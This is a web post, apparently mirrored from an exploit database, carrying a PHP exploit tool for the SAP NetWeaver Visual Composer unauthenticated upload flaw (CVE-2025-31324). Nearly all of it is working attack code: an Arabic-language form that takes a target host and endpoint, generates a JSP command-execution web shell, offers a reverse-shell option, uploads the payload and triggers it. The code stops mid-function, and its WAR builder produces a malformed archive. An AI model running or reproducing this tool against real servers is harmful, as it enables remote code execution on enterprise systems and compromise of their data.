{"id":41396,"date":"2026-02-18T11:48:36","date_gmt":"2026-02-18T11:48:36","guid":{"rendered":"http:\/\/localhost\/?p=41396"},"modified":"2026-02-18T11:48:36","modified_gmt":"2026-02-18T11:48:36","slug":"sap-netweaver-720-visual-composer-metadata-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41396","title":{"rendered":"\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload_PACKETSTORM:215831"},"content":{"rendered":"

{“lastseen”:”2026-02-18T17:32:05″,”description”:”SAP NetWeaver Visual Composer contains an unauthenticated file upload vulnerability in the metadata uploader component that allows attackers to upload arbitrary files including JSP web shells and WAR applications, leading to remote code execution on…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 SAP NetWeaver 7.20 Visual Composer Metadata Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215831″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-31324″],”sourceData”:”=============================================================================================================================================\\n | # Title : SAP NetWeaver 7.20 Visual Composer Metadata Exploitation Tool |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.sap.com\/ |\\n =============================================================================================================================================\\n \\n [+] Summary :\\n \\n SAP NetWeaver Visual Composer contains an unauthenticated file upload vulnerability in the metadata uploader component (CVE-2025-31324) \\n that allows attackers to upload arbitrary files including JSP web shells and WAR applications, leading to remote code execution on the SAP server.\\n The vulnerability exists in the metadata uploader component of SAP NetWeaver Visual Composer, which fails to properly authenticate and validate file uploads. \\n Attackers can exploit this by directly uploading malicious files to vulnerable endpoints without any authentication.\\n \\n [+] Usage: \\n \\n http:\/\/localhost\/poc.php\\n \\n [+] POC :\\n \\n \\u003c?php\\n \\n \\n class SAPWebExploit {\\n private $config;\\n \\n public function __construct() {\\n $this-\\u003econfig = [\\n ‘upload_dir’ =\\u003e ‘uploads\/’,\\n ‘max_file_size’ =\\u003e 10485760, \\n ‘allowed_types’ =\\u003e [‘jsp’, ‘war’, ‘jar’, ‘xml’]\\n ];\\n \\n if (!is_dir($this-\\u003econfig[‘upload_dir’])) {\\n mkdir($this-\\u003econfig[‘upload_dir’], 0755, true);\\n }\\n }\\n \\n public function handleRequest() {\\n if ($_SERVER[‘REQUEST_METHOD’] === ‘POST’) {\\n $this-\\u003ehandleExploit();\\n } else {\\n $this-\\u003eshowForm();\\n }\\n }\\n \\n private function showForm() {\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml lang=\\”ar\\” dir=\\”rtl\\”\\u003e\\n \\u003chead\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cmeta name=\\”viewport\\” content=\\”width=device-width, initial-scale=1.0\\”\\u003e\\n \\u003ctitle\\u003eby indoushka \u0644\u0623\u062f\u0627\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 SAP CVE-2025-31324\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n * {\\n margin: 0;\\n padding: 0;\\n box-sizing: border-box;\\n font-family: \\”Segoe UI\\”, Tahoma, Geneva, Verdana, sans-serif;\\n }\\n \\n body {\\n background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);\\n min-height: 100vh;\\n padding: 20px;\\n direction: rtl;\\n }\\n \\n .container {\\n max-width: 1000px;\\n margin: 0 auto;\\n background: white;\\n border-radius: 15px;\\n box-shadow: 0 20px 40px rgba(0,0,0,0.1);\\n overflow: hidden;\\n }\\n \\n .header {\\n background: linear-gradient(135deg, #2c3e50, #34495e);\\n color: white;\\n padding: 30px;\\n text-align: center;\\n }\\n \\n .header h1 {\\n font-size: 28px;\\n margin-bottom: 10px;\\n }\\n \\n .header .subtitle {\\n opacity: 0.8;\\n font-size: 14px;\\n }\\n \\n .content {\\n padding: 30px;\\n }\\n \\n .form-section {\\n margin-bottom: 30px;\\n padding: 20px;\\n border: 2px dashed #ddd;\\n border-radius: 10px;\\n background: #f8f9fa;\\n }\\n \\n .form-section h3 {\\n color: #2c3e50;\\n margin-bottom: 15px;\\n padding-bottom: 10px;\\n border-bottom: 2px solid #3498db;\\n }\\n \\n .form-group {\\n margin-bottom: 20px;\\n }\\n \\n label {\\n display: block;\\n margin-bottom: 8px;\\n font-weight: 600;\\n color: #2c3e50;\\n }\\n \\n input[type=\\”text\\”],\\n input[type=\\”number\\”],\\n input[type=\\”file\\”],\\n select {\\n width: 100%;\\n padding: 12px;\\n border: 2px solid #ddd;\\n border-radius: 8px;\\n font-size: 16px;\\n transition: border-color 0.3s;\\n }\\n \\n input:focus, select:focus {\\n outline: none;\\n border-color: #3498db;\\n }\\n \\n .checkbox-group {\\n display: flex;\\n align-items: center;\\n gap: 10px;\\n }\\n \\n .checkbox-group input {\\n width: auto;\\n }\\n \\n .btn {\\n background: linear-gradient(135deg, #3498db, #2980b9);\\n color: white;\\n padding: 15px 30px;\\n border: none;\\n border-radius: 8px;\\n font-size: 16px;\\n font-weight: 600;\\n cursor: pointer;\\n transition: transform 0.2s;\\n width: 100%;\\n }\\n \\n .btn:hover {\\n transform: translateY(-2px);\\n }\\n \\n .btn-danger {\\n background: linear-gradient(135deg, #e74c3c, #c0392b);\\n }\\n \\n .results {\\n margin-top: 30px;\\n padding: 20px;\\n background: #2c3e50;\\n color: white;\\n border-radius: 8px;\\n display: none;\\n }\\n \\n .result-section {\\n margin-bottom: 15px;\\n }\\n \\n .result-title {\\n font-weight: 600;\\n color: #3498db;\\n margin-bottom: 5px;\\n }\\n \\n .alert {\\n padding: 15px;\\n border-radius: 8px;\\n margin-bottom: 20px;\\n }\\n \\n .alert-success {\\n background: #d4edda;\\n color: #155724;\\n border: 1px solid #c3e6cb;\\n }\\n \\n .alert-danger {\\n background: #f8d7da;\\n color: #721c24;\\n border: 1px solid #f5c6cb;\\n }\\n \\n .tabs {\\n display: flex;\\n margin-bottom: 20px;\\n border-bottom: 2px solid #ddd;\\n }\\n \\n .tab {\\n padding: 12px 24px;\\n cursor: pointer;\\n border-bottom: 3px solid transparent;\\n transition: all 0.3s;\\n }\\n \\n .tab.active {\\n border-bottom-color: #3498db;\\n color: #3498db;\\n font-weight: 600;\\n }\\n \\n .tab-content {\\n display: none;\\n }\\n \\n .tab-content.active {\\n display: block;\\n }\\n \\n .payload-preview {\\n background: #2c3e50;\\n color: #ecf0f1;\\n padding: 15px;\\n border-radius: 8px;\\n font-family: monospace;\\n font-size: 12px;\\n max-height: 200px;\\n overflow-y: auto;\\n margin-top: 10px;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003cdiv class=\\”header\\”\\u003e\\n \\u003ch1\\u003e\u0623\u062f\u0627\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 SAP CVE-2025-31324\\u003c\/h1\\u003e\\n \\u003cdiv class=\\”subtitle\\”\\u003eSAP NetWeaver Visual Composer Metadata Uploader – Unauthenticated File Upload\\u003c\/div\\u003e\\n \\u003cdiv class=\\”subtitle\\”\\u003ePowered by indoushka\\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”content\\”\\u003e\\n \\u003cdiv class=\\”tabs\\”\\u003e\\n \\u003cdiv class=\\”tab active\\” onclick=\\”switchTab(0)\\”\\u003e \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0633\u0631\u064a\u0639\\u003c\/div\\u003e\\n \\u003cdiv class=\\”tab\\” onclick=\\”switchTab(1)\\”\\u003e \u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0645\u062a\u0642\u062f\u0645\u0629\\u003c\/div\\u003e\\n \\u003cdiv class=\\”tab\\” onclick=\\”switchTab(2)\\”\\u003e \u062a\u0648\u0644\u064a\u062f \u0627\u0644\u062d\u0645\u0648\u0644\u0627\u062a\\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”POST\\” enctype=\\”multipart\/form-data\\” id=\\”exploitForm\\”\\u003e\\n \\n \\u003c!– Tab 1: Quick Exploit –\\u003e\\n \\u003cdiv class=\\”tab-content active\\” id=\\”tab1\\”\\u003e\\n \\u003cdiv class=\\”form-section\\”\\u003e\\n \\u003ch3\\u003e \u0627\u0644\u0647\u062f\u0641 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”host\\”\\u003e\u0627\u0633\u0645 \u0627\u0644\u062e\u0627\u062f\u0645 (Host):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”host\\” name=\\”host\\” placeholder=\\”example.com\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003e\u0627\u0644\u0645\u0646\u0641\u0630 (Port):\\u003c\/label\\u003e\\n \\u003cinput type=\\”number\\” id=\\”port\\” name=\\”port\\” value=\\”50001\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”endpoint\\”\\u003e\u0645\u0633\u0627\u0631 \u0627\u0644\u0631\u0641\u0639 (Endpoint):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”endpoint\\” name=\\”endpoint\\” \\n value=\\”\/irj\/portal\/sap\/bc\/webdynpro\/sap\/ZWDC_METADATA_UPLDR\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-section\\”\\u003e\\n \\u003ch3\\u003e \u0627\u0644\u062d\u0645\u0648\u0644\u0629\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003e\u0646\u0648\u0639 \u0627\u0644\u062d\u0645\u0648\u0644\u0629:\\u003c\/label\\u003e\\n \\u003cselect name=\\”payload_type\\” id=\\”payloadType\\” onchange=\\”togglePayloadOptions()\\”\\u003e\\n \\u003coption value=\\”file\\”\\u003e\u0631\u0641\u0639 \u0645\u0644\u0641 \u0645\u0648\u062c\u0648\u062f\\u003c\/option\\u003e\\n \\u003coption value=\\”generate_jsp\\”\\u003e\u062a\u0648\u0644\u064a\u062f JSP Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”generate_war\\”\\u003e\u062a\u0648\u0644\u064a\u062f WAR File\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\” id=\\”fileUploadGroup\\”\\u003e\\n \\u003clabel for=\\”payload_file\\”\\u003e\u0631\u0641\u0639 \u0645\u0644\u0641 \u0627\u0644\u062d\u0645\u0648\u0644\u0629:\\u003c\/label\\u003e\\n \\u003cinput type=\\”file\\” id=\\”payload_file\\” name=\\”payload_file\\” \\n accept=\\”.jsp,.war,.jar,.xml\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\” id=\\”commandGroup\\” style=\\”display:none;\\”\\u003e\\n \\u003clabel for=\\”command\\”\\u003e\u0627\u0644\u0623\u0645\u0631 \u0627\u0644\u0645\u0637\u0644\u0648\u0628 \u062a\u0646\u0641\u064a\u0630\u0647:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”command\\” name=\\”command\\” value=\\”whoami\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\” id=\\”reverseShellGroup\\” style=\\”display:none;\\”\\u003e\\n \\u003clabel for=\\”lhost\\”\\u003eIP \u0627\u0644\u0645\u0633\u062a\u0645\u0639 (LHOST):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lhost\\” name=\\”lhost\\” placeholder=\\”192.168.1.100\\”\\u003e\\n \\n \\u003clabel for=\\”lport\\” style=\\”margin-top:10px;\\”\\u003e\u0645\u0646\u0641\u0630 \u0627\u0644\u0645\u0633\u062a\u0645\u0639 (LPORT):\\u003c\/label\\u003e\\n \\u003cinput type=\\”number\\” id=\\”lport\\” name=\\”lport\\” value=\\”4444\\”\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003c!– Tab 2: Advanced Settings –\\u003e\\n \\u003cdiv class=\\”tab-content\\” id=\\”tab2\\”\\u003e\\n \\u003cdiv class=\\”form-section\\”\\u003e\\n \\u003ch3\\u003e\u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0645\u062a\u0642\u062f\u0645\u0629\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”form-group checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”https\\” name=\\”https\\”\\u003e\\n \\u003clabel for=\\”https\\”\\u003e\u0627\u0633\u062a\u062e\u062f\u0627\u0645 HTTPS\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”bypass_portal\\” name=\\”bypass_portal\\” checked\\u003e\\n \\u003clabel for=\\”bypass_portal\\”\\u003e\u062a\u062c\u0627\u0648\u0632 Portal (\u0625\u0632\u0627\u0644\u0629 \/portal \u0645\u0646 \u0627\u0644\u0645\u0633\u0627\u0631\u0627\u062a)\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”field_name\\”\\u003e\u0627\u0633\u0645 \u062d\u0642\u0644 \u0627\u0644\u0631\u0641\u0639:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”field_name\\” name=\\”field_name\\” value=\\”UPLOAD_METADATA\\”\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-section\\”\\u003e\\n \\u003ch3\\u003e \u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0627\u0644\u062a\u0641\u0639\u064a\u0644\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”trigger_path\\”\\u003e\u0645\u0633\u0627\u0631 \u0627\u0644\u062a\u0641\u0639\u064a\u0644:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”trigger_path\\” name=\\”trigger_path\\” \\n placeholder=\\”\/irj\/portal\/irj\/servlet_jsp\/irj\/root\/shell.jsp\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”trigger_host\\”\\u003e\u062e\u0627\u062f\u0645 \u0627\u0644\u062a\u0641\u0639\u064a\u0644 (\u0627\u0641\u062a\u0631\u0627\u0636\u064a: \u0646\u0641\u0633 \u0627\u0644\u062e\u0627\u062f\u0645):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”trigger_host\\” name=\\”trigger_host\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”trigger_port\\”\\u003e\u0645\u0646\u0641\u0630 \u0627\u0644\u062a\u0641\u0639\u064a\u0644:\\u003c\/label\\u003e\\n \\u003cinput type=\\”number\\” id=\\”trigger_port\\” name=\\”trigger_port\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”trigger_https\\” name=\\”trigger_https\\”\\u003e\\n \\u003clabel for=\\”trigger_https\\”\\u003e\u0627\u0633\u062a\u062e\u062f\u0627\u0645 HTTPS \u0644\u0644\u062a\u0641\u062a\u064a\u0644\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003c!– Tab 3: Payload Generation –\\u003e\\n \\u003cdiv class=\\”tab-content\\” id=\\”tab3\\”\\u003e\\n \\u003cdiv class=\\”form-section\\”\\u003e\\n \\u003ch3\\u003e \u062a\u0648\u0644\u064a\u062f \u0627\u0644\u062d\u0645\u0648\u0644\u0627\u062a\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003e\u0646\u0648\u0639 \u0627\u0644\u062d\u0645\u0648\u0644\u0629:\\u003c\/label\\u003e\\n \\u003cselect name=\\”gen_type\\” onchange=\\”showPayloadPreview()\\”\\u003e\\n \\u003coption value=\\”jsp_cmd\\”\\u003eJSP – \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631\\u003c\/option\\u003e\\n \\u003coption value=\\”jsp_reverse\\”\\u003eJSP – Reverse Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”war_simple\\”\\u003eWAR – Web Shell\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”gen_command\\”\\u003e\u0627\u0644\u0623\u0645\u0631:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”gen_command\\” name=\\”gen_command\\” value=\\”id\\” onkeyup=\\”showPayloadPreview()\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”gen_lhost\\”\\u003eIP \u0627\u0644\u0645\u0633\u062a\u0645\u0639:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”gen_lhost\\” name=\\”gen_lhost\\” value=\\”192.168.1.100\\” onkeyup=\\”showPayloadPreview()\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”gen_lport\\”\\u003e\u0645\u0646\u0641\u0630 \u0627\u0644\u0645\u0633\u062a\u0645\u0639:\\u003c\/label\\u003e\\n \\u003cinput type=\\”number\\” id=\\”gen_lport\\” name=\\”gen_lport\\” value=\\”4444\\” onkeyup=\\”showPayloadPreview()\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003e\u0645\u0639\u0627\u064a\u0646\u0629 \u0627\u0644\u062d\u0645\u0648\u0644\u0629:\\u003c\/label\\u003e\\n \\u003cdiv class=\\”payload-preview\\” id=\\”payloadPreview\\”\\u003e\\n \/\/ \u0633\u064a\u062a\u0645 \u0639\u0631\u0636 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0647\u0646\u0627…\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”button\\” class=\\”btn\\” onclick=\\”downloadPayload()\\”\\u003e \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629\\u003c\/button\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” class=\\”btn\\”\\u003e \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\u003c\/button\\u003e\\n \\u003cbutton type=\\”button\\” class=\\”btn btn-danger\\” onclick=\\”clearForm()\\”\\u003e \u0645\u0633\u062d \u0627\u0644\u0646\u0645\u0648\u0630\u062c\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”results\\” id=\\”results\\”\\u003e\\n \\u003ch3\\u003e \u0627\u0644\u0646\u062a\u0627\u0626\u062c:\\u003c\/h3\\u003e\\n \\u003cdiv id=\\”resultContent\\”\\u003e\\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cscript\\u003e\\n function switchTab(tabIndex) {\\n \\n document.querySelectorAll(\\”.tab\\”).forEach(tab =\\u003e tab.classList.remove(\\”active\\”));\\n document.querySelectorAll(\\”.tab-content\\”).forEach(content =\\u003e content.classList.remove(\\”active\\”));\\n \\n \/\/ Show selected tab and content\\n document.querySelectorAll(\\”.tab\\”)[tabIndex].classList.add(\\”active\\”);\\n document.querySelectorAll(\\”.tab-content\\”)[tabIndex].classList.add(\\”active\\”);\\n }\\n \\n function togglePayloadOptions() {\\n const type = document.getElementById(\\”payloadType\\”).value;\\n document.getElementById(\\”fileUploadGroup\\”).style.display = \\n type === \\”file\\” ? \\”block\\” : \\”none\\”;\\n document.getElementById(\\”commandGroup\\”).style.display = \\n type.includes(\\”jsp\\”) ? \\”block\\” : \\”none\\”;\\n document.getElementById(\\”reverseShellGroup\\”).style.display = \\n type === \\”generate_war\\” ? \\”block\\” : \\”none\\”;\\n }\\n \\n function showPayloadPreview() {\\n const type = document.querySelector(\\”select[name=\\\\\\”gen_type\\\\\\”]\\”).value;\\n const command = document.getElementById(\\”gen_command\\”).value;\\n const lhost = document.getElementById(\\”gen_lhost\\”).value;\\n const lport = document.getElementById(\\”gen_lport\\”).value;\\n \\n let preview = \\”\\”;\\n \\n if (type === \\”jsp_cmd\\”) {\\n preview = `\\u003c%@ page import=\\”java.util.*,java.io.*\\” %\\u003e\\\\n` +\\n `\\u003c%\\\\n` +\\n `String cmd = \\”${command}\\”;\\\\n` +\\n `Process p = Runtime.getRuntime().exec(cmd);\\\\n` +\\n `\/\/ … \u0643\u0648\u062f \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631 …\\\\n` +\\n `%\\u003e`;\\n } else if (type === \\”jsp_reverse\\”) {\\n preview = `\/\/ Reverse Shell to ${lhost}:${lport}\\\\n` +\\n `Socket s = new Socket(\\”${lhost}\\”, ${lport});\\\\n` +\\n `\/\/ … \u0643\u0648\u062f \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0627\u0644\u0639\u0643\u0633\u064a …`;\\n } else if (type === \\”war_simple\\”) {\\n preview = `\/\/ WAR File Structure\\\\n` +\\n `WEB-INF\/web.xml\\\\n` +\\n `shell.jsp\\\\n` +\\n `\/\/ Contains JSP Web Shell`;\\n }\\n \\n document.getElementById(\\”payloadPreview\\”).textContent = preview;\\n }\\n \\n function downloadPayload() {\\n alert(\\”\u0633\u064a\u062a\u0645 \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629… (\u0647\u0630\u0647 \u0645\u062c\u0631\u062f \u0648\u0627\u062c\u0647\u0629 \u062a\u062c\u0631\u064a\u0628\u064a\u0629)\\”);\\n }\\n \\n function clearForm() {\\n document.getElementById(\\”exploitForm\\”).reset();\\n document.getElementById(\\”results\\”).style.display = \\”none\\”;\\n }\\n \\n \/\/ Initialize\\n togglePayloadOptions();\\n showPayloadPreview();\\n \\u003c\/script\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n \\n private function handleExploit() {\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml lang=\\”ar\\” dir=\\”rtl\\”\\u003e\\n \\u003chead\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003ctitle\\u003e\u0646\u062a\u0627\u0626\u062c \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body { font-family: Arial, sans-serif; padding: 20px; direction: rtl; }\\n .result { background: #f8f9fa; padding: 15px; margin: 10px 0; border-radius: 5px; }\\n .success { background: #d4edda; color: #155724; }\\n .error { background: #f8d7da; color: #721c24; }\\n .warning { background: #fff3cd; color: #856404; }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003ch1\\u003e \u0646\u062a\u0627\u0626\u062c \u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\\u003c\/h1\\u003e\\n \\u003cdiv class=\\”result\\”\\u003e’;\\n \\n try {\\n $results = $this-\\u003eexecuteExploit();\\n $this-\\u003edisplayResults($results);\\n } catch (Exception $e) {\\n echo ‘\\u003cdiv class=\\”error\\”\\u003e\u062e\u0637\u0623: ‘ . htmlspecialchars($e-\\u003egetMessage()) . ‘\\u003c\/div\\u003e’;\\n }\\n \\n echo ‘\\u003c\/div\\u003e\\n \\u003cbr\\u003e\\n \\u003ca href=\\”‘ . $_SERVER[‘PHP_SELF’] . ‘\\” style=\\”padding: 10px 20px; background: #007bff; color: white; text-decoration: none; border-radius: 5px;\\”\\u003e\u21bb \u0627\u0644\u0639\u0648\u062f\u0629 \u0644\u0644\u0646\u0645\u0648\u0630\u062c\\u003c\/a\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n \\n private function executeExploit() {\\n $results = [];\\n \\n $host = $_POST[‘host’] ?? ”;\\n $port = $_POST[‘port’] ?? ‘50001’;\\n $endpoint = $_POST[‘endpoint’] ?? ”;\\n \\n if (empty($host) || empty($endpoint)) {\\n throw new Exception(\\”\u064a\u062c\u0628 \u062a\u0639\u0628\u0626\u0629 \u0627\u0644\u062d\u0642\u0648\u0644 \u0627\u0644\u0625\u0644\u0632\u0627\u0645\u064a\u0629\\”);\\n }\\n \\n $results[] = \\” \u0627\u0644\u0647\u062f\u0641: $host:$port\\”;\\n $results[] = \\”\u0627\u0644\u0645\u0633\u0627\u0631: $endpoint\\”;\\n $payloadFile = $this-\\u003ehandlePayload();\\n $results[] = \\” \u0627\u0644\u062d\u0645\u0648\u0644\u0629: \\” . basename($payloadFile);\\n \\n $https = isset($_POST[‘https’]) ? true : false;\\n $baseUrl = ($https ? ‘https’ : ‘http’) . \\”:\/\/$host:$port\\”;\\n \\n if (isset($_POST[‘bypass_portal’])) {\\n $endpoint = str_replace(‘\/portal’, ”, $endpoint);\\n $results[] = \\” \u062a\u0645 \u062a\u062c\u0627\u0648\u0632 Portal: $endpoint\\”;\\n }\\n \\n \/\/ Execute upload\\n $uploadResult = $this-\\u003euploadFile($baseUrl, $endpoint, $payloadFile);\\n $results[] = \\” \u0646\u062a\u064a\u062c\u0629 \u0627\u0644\u0631\u0641\u0639: \\” . $uploadResult;\\n \\n $triggerPath = $_POST[‘trigger_path’] ?? ”;\\n if (!empty($triggerPath)) {\\n $triggerResult = $this-\\u003etriggerPayload($baseUrl, $triggerPath);\\n $results[] = \\” \u0646\u062a\u064a\u062c\u0629 \u0627\u0644\u062a\u0641\u0639\u064a\u0644: \\” . $triggerResult;\\n }\\n \\n if (strpos($payloadFile, $this-\\u003econfig[‘upload_dir’]) !== false) {\\n unlink($payloadFile);\\n }\\n \\n return $results;\\n }\\n \\n private function handlePayload() {\\n $payloadType = $_POST[‘payload_type’] ?? ‘file’;\\n \\n if ($payloadType === ‘file’) {\\n \\n if (!isset($_FILES[‘payload_file’]) || $_FILES[‘payload_file’][‘error’] !== UPLOAD_ERR_OK) {\\n throw new Exception(\\”\u062e\u0637\u0623 \u0641\u064a \u0631\u0641\u0639 \u0627\u0644\u0645\u0644\u0641\\”);\\n }\\n \\n $uploadedFile = $_FILES[‘payload_file’];\\n $filename = $this-\\u003econfig[‘upload_dir’] . uniqid() . ‘_’ . $uploadedFile[‘name’];\\n \\n if (!move_uploaded_file($uploadedFile[‘tmp_name’], $filename)) {\\n throw new Exception(\\”\u0641\u0634\u0644 \u0641\u064a \u062d\u0641\u0638 \u0627\u0644\u0645\u0644\u0641\\”);\\n }\\n \\n return $filename;\\n \\n } else {\\n \\n return $this-\\u003egeneratePayload();\\n }\\n }\\n \\n private function generatePayload() {\\n $type = $_POST[‘payload_type’];\\n $filename = $this-\\u003econfig[‘upload_dir’] . ‘generated_’ . uniqid();\\n \\n if ($type === ‘generate_jsp’) {\\n $filename .= ‘.jsp’;\\n $command = $_POST[‘command’] ?? ‘whoami’;\\n $content = $this-\\u003egenerateJspPayload($command);\\n } elseif ($type === ‘generate_war’) {\\n $filename .= ‘.war’;\\n $lhost = $_POST[‘lhost’] ?? ‘192.168.1.100’;\\n $lport = $_POST[‘lport’] ?? ‘4444’;\\n $content = $this-\\u003egenerateWarPayload($lhost, $lport);\\n }\\n \\n file_put_contents($filename, $content);\\n return $filename;\\n }\\n \\n private function generateJspPayload($command) {\\n return ‘\\u003c%@ page import=\\”java.util.*,java.io.*\\” %\\u003e\\n \\u003c%\\n String cmd = \\”‘ . $command . ‘\\”;\\n if (cmd != null) {\\n Process p = Runtime.getRuntime().exec(cmd);\\n OutputStream os = p.getOutputStream();\\n InputStream in = p.getInputStream();\\n DataInputStream dis = new DataInputStream(in);\\n String disr = dis.readLine();\\n while (disr != null) {\\n out.println(disr);\\n disr = dis.readLine();\\n }\\n }\\n %\\u003e’;\\n }\\n \\n private function generateWarPayload($lhost, $lport) {\\n $jspContent = $this-\\u003egenerateJspPayload(‘id’);\\n $warContent = \\”PK\\\\x03\\\\x04\\”; \/\/ ZIP header\\n $webXml = ‘\\u003c?xml version=\\”1.0\\” ?\\u003e\\n \\u003cweb-app xmlns=\\”http:\/\/java.sun.com\/xml\/ns\/j2ee\\”\\n version=\\”2.4\\”\\u003e\\n \\u003cdisplay-name\\u003eShell\\u003c\/display-name\\u003e\\n \\u003c\/web-app\\u003e’;\\n \\n return $warContent . $webXml . $jspContent;\\n }\\n \\n private function uploadFile($baseUrl, $endpoint, $payloadFile) {\\n $url = $baseUrl . $endpoint;\\n $fieldName = $_POST[‘field_name’] ?? ‘UPLOAD_METADATA’;\\n \\n $ch = 